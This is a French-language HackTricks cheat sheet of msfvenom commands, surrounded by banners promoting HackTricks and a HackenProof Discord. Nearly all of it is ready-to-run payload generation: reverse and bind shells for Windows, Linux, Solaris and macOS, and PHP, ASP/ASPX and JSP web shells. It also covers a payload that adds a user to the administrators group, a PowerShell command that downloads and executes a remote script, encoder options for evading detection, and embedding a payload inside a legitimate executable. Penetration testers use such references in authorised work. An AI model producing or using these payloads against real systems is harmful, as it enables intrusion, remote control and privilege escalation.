Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge AWS de HackTricks) ! Autres façons de soutenir HackTricks :
Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF , consultez les PLANS D'ABONNEMENT !
Rejoignez le serveur HackenProof Discord pour communiquer avec des pirates expérimentés et des chasseurs de primes en bugs !
Perspectives de piratage
Engagez-vous avec du contenu qui explore le frisson et les défis du piratage
Actualités de piratage en temps réel
Restez à jour avec le monde du piratage en évolution rapide grâce aux actualités et aux informations en temps réel
Dernières annonces
Restez informé des dernières primes de bugs lancées et des mises à jour cruciales de la plateforme
Rejoignez-nous sur Discord et commencez à collaborer avec les meilleurs pirates dès aujourd'hui !
Msfvenom de base
msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>
On peut également utiliser le -a
pour spécifier l'architecture ou la --platform
Listing
Copier msfvenom -l payloads #Payloads
msfvenom -l encoders #Encoders
Paramètres courants lors de la création d'un shellcode
Copier -b "\x00\x0a\x0d"
-f c
-e x86/shikata_ga_nai -i 5
EXITFUNC = thread
PrependSetuid = True #Use this to create a shellcode that will execute something with SUID
Shell Inversé
Copier msfvenom -p windows/meterpreter/reverse_tcp LHOST= ( IP Address ) LPORT=( Your Port ) -f exe > reverse.exe
Coquille de liaison
Copier msfvenom -p windows/meterpreter/bind_tcp RHOST= ( IP Address ) LPORT=( Your Port ) -f exe > bind.exe
Créer un utilisateur
Copier msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
Shell CMD
Copier msfvenom -p windows/shell/reverse_tcp LHOST= ( IP Address ) LPORT=( Your Port ) -f exe > prompt.exe
Exécuter une commande
Copier msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
msfvenom -a x86 --platform Windows -p windows/exec CMD= "net localgroup administrators shaun /add" -f exe > pay.exe
Encodeur
Copier msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
Intégré à l'intérieur de l'exécutable
Copier msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe
Charges Linux
Shell Inversé
Copier msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= ( IP Address ) LPORT=( Your Port ) -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
Coquille de liaison
Copier msfvenom -p linux/x86/meterpreter/bind_tcp RHOST= ( IP Address ) LPORT=( Your Port ) -f elf > bind.elf
SunOS (Solaris)
Copier msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
Charges MAC
Shell Inversé:
Copier msfvenom -p osx/x86/shell_reverse_tcp LHOST= ( IP Address ) LPORT=( Your Port ) -f macho > reverse.macho
Shell de liaison
Copier msfvenom -p osx/x86/shell_bind_tcp RHOST= ( IP Address ) LPORT=( Your Port ) -f macho > bind.macho
Charges utiles basées sur le Web
PHP
Shell inversé
Copier msfvenom -p php/meterpreter_reverse_tcp LHOST= < I P > LPORT= < POR T > -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP/x
Shell inversé
Copier msfvenom -p windows/meterpreter/reverse_tcp LHOST= ( IP Address ) LPORT=( Your Port ) -f asp > reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST= ( IP Address ) LPORT=( Your Port ) -f aspx > reverse.aspx
JSP
Shell inversé
Copier msfvenom -p java/jsp_shell_reverse_tcp LHOST= ( IP Address ) LPORT=( Your Port ) -f raw > reverse.jsp
NodeJS
Copier msfvenom -p nodejs/shell_reverse_tcp LHOST= ( IP Address ) LPORT=( Your Port )
Chargements de langage de script
Perl
Copier msfvenom -p cmd/unix/reverse_perl LHOST= ( IP Address ) LPORT=( Your Port ) -f raw > reverse.pl
Python
Copier msfvenom -p cmd/unix/reverse_python LHOST= ( IP Address ) LPORT=( Your Port ) -f raw > reverse.py
Bash
Copier msfvenom -p cmd/unix/reverse_bash LHOST= < Local IP Addres s > LPORT= < Local Por t > -f raw > shell.sh
Rejoignez le serveur HackenProof Discord pour communiquer avec des hackers expérimentés et des chasseurs de bugs !
Perspectives de piratage
Engagez-vous avec du contenu qui explore les sensations et les défis du piratage
Actualités de piratage en temps réel
Restez à jour avec le monde du piratage en évolution rapide grâce aux actualités et aux informations en temps réel
Dernières annonces
Restez informé des dernières primes de bugs lancées et des mises à jour cruciales de la plateforme
Rejoignez-nous sur Discord et commencez à collaborer avec les meilleurs hackers dès aujourd'hui !
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge AWS de HackTricks) ! Autres façons de soutenir HackTricks :
Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF Consultez les PLANS D'ABONNEMENT !
Dernière mise à jour il y a 3 mois